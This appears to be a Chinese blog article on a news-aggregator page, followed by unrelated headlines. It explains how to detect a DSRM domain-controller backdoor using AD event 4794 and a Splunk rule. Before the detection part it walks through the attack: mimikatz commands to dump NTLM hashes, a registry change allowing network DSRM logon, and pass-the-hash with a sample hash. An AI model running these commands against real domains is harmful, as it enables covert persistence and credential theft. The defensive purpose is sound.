01、简介
(资料图)
每个域控制器都有一个目录还原模式(DSRM)帐户,它的密码是在安装域控时设置的,实际上它对应的就是sam文件里的本地管理员“administrator”,基本很少会被重置,因此有着极强的隐蔽性。攻击者通过获取域控的DSRM密码,就可以使用帐户通过网络登录到域控服务器,从而达到权限维持的目的。
域内权限维持的方式有很多,每增加一条安全检测规则,就多一层安全保障。针对DSRM后门,基于AD Event日志能够帮助我们提供什么维度的检测,我们通过一个后门利用实例来看一下。
02、利用方式
(1)获取域内用户Hash
使用mimikatz查看域内用户test的NTLM Hash。
mimikatz # privilege::debugmimikatz # lsadump::lsa /patch /name:test
(2)将DSRM帐户和域用户的NTLM Hash同步
使用DSRM的密码和指定域用户test的密码进行同步,在命令行环境中使用ntdsutil工具重置DSRM管理员密码。
(3)抓取DSRM密码
因同步域内用户test的NTLM Hash,可以发现,DSRM Hash 和域用户test的NTLM Hash一致。
mimikatz#privilege::debugmimikatz # token::elevatemimikatz # lsadump::sam
(4)修改DSRM登录方式
DSRM 有三种登录方式,具体如下:
0:默认值,只有当域控制器重启并进入 DSRM 模式时,才可以使用 DSRM 管理员账号1:只有当本地 AD、DS 服务停止时,才可以使用 DSRM 管理员账号登录域控制器2:在任何情况下,都可以使用 DSRM 管理员账号登录域控制器
如果要使用 DSRM 账号通过网络登录域控制器,需要将该值设置为 2。
修改注册表:
reg add "HKLM\System\CurrentControlSet\Control\Lsa" /f /v DsrmAdminLogonBehavior /t REG_DWORD /d 2
(5)使用DSRM远程登录
在域成员服务器上使用DSRM进行远程登录,注意domain使用域控的主机名。
mimikatz # privilege::debugmimikatz # sekurlsa::pth /user:administrator /domain:win-dc01 /ntlm:44f077e27f6fef69e7bd834c7242b040
03、攻击检测
当攻击者尝试重置DSRM管理员密码或是指定域内用户NTLM Hash同步时,都会生成4769事件,因此可以实时监控4794事件,一旦攻击者尝试修改DSRM密码就会触发告警。
4794事件:每次更改目录还原模式(DSRM)管理员密码时,就会生成此事件,包含SID和帐户名,以及调用方工作站。
安全规则:
index=ad EventCode=4794 | stats count earliest(_time) AS start_time latest(_time) AS end_time by dest user| eval start_time=strftime(start_time,"%Y-%m-%d %H:%M:%S")| eval end_time=strftime(end_time,"%Y-%m-%d %H:%M:%S") | eval message="在"+start_time+"到"+end_time+"时间内,域控服务器:"+dest +" 疑似DSRM域后门行为,试图设置目录服务还原模式管理员密码"+count+"次,操作账号:"+user| table start_time end_time user message
安全告警效果如下图:
X 关闭
- 1、基于AD Event日志实时检测DSRM后门
- 2、原神:大世界必带的五星角色,前三个是真舒服
- 3、小小牛娃,大显身手!东师坪实一年级开展“我是家务小能手”综合学习活动
- 4、湖人主帅谈第三节崩盘,他不认为启用五后卫阵容是错:当时为了提速|世界观察
- 5、【世界新视野】沪光股份1月11日盘中跌停
- 6、雷神众测漏洞周报2023.1.3-2023.1.8_简讯
- 7、天天看热讯:1月10日基金净值:华夏军工安全混合A最新净值1.663,跌0.66%
- 8、环球今头条!快,支付宝叫你集五福了!
- 9、即时焦点:西大门(605155)1月10日主力资金净卖出23.87万元
- 10、热点聚焦:千方科技(002373)1月9日主力资金净卖出389.90万元
-
祥明智能(301226)1月9日主力资金净买入405.77万元
截至2023年1月9日收盘,祥明智能(301226)报收于31 55元,上涨5 13%,换手率9 14%,成交量1 55万手,成交额4854 21万元。
-
你我贷网贷逾期4天征信有什么影响
网贷逾期一般会上征信,有些借贷机构在用户逾期后一天后就会上报给征信机构,而有些借贷机构则是会在几天后上报给征信机构,因为有些借贷机构可
-
成都驾驶证期满换证流程 世界独家
办理费用:机动车反光号牌100元 副;摩托车反光号牌70元 副;三轮汽车、低速货车、拖拉机反光号牌40元 副;挂车反光号牌50元 副机动车临时号牌
-
ppmoney网贷借不还会起诉吗
可能会。如果用户使用网贷消费之后出现了逾期,并且经过网贷机构和第三方的催收人员催缴欠款无果之后,网贷公司可能就会向法院提起诉讼。网贷
-
看点:沿江而行,感受锦江之美
多情最是锦江水一步依依一回头沿江而行,带你感受锦江之美111111111111111111来源:微铜仁陈智华
-
开好局起好步 | 2022全省县域经济发展影响力观察报告——“农业”“粮食”“生产”成中江热词_当前焦点
梳理这一年川报全媒体对中江县的相关报道显示,“农业”“粮食”“生产”“农村”等成为高频关键词。
-
天天热文:宇洪科技及所属控股公司拟向银行申请不超过1.2亿综合授信额度
挖贝网1月6日,宇洪科技(872199)近日发布公告,为了满足公司经营发展需要,公司及所属控股公司拟通过银行授信的融资方式补充资金需求,拟向
-
北京新增4.8亿方天然气应急调峰能力|全球微头条
记者从北京燃气集团获悉,北京燃气天津南港液化天然气应急储备项目一期工程近日顺利通过完工验收,标志着该项目一期工程全面实现
-
焦点观察:硅片价崩|行业进入新一轮洗牌期 隆基、中环、通威谁将被降本增效的洪流卷走?
出品:新浪财经上市公司研究院作者:昊导语:受产能、需求及技术三重因素的共同影响,光伏行业呈现出明显的周期性与成长
-
宇新股份(002986):股东减持股份计划期限届满
2023年01月07日公告发布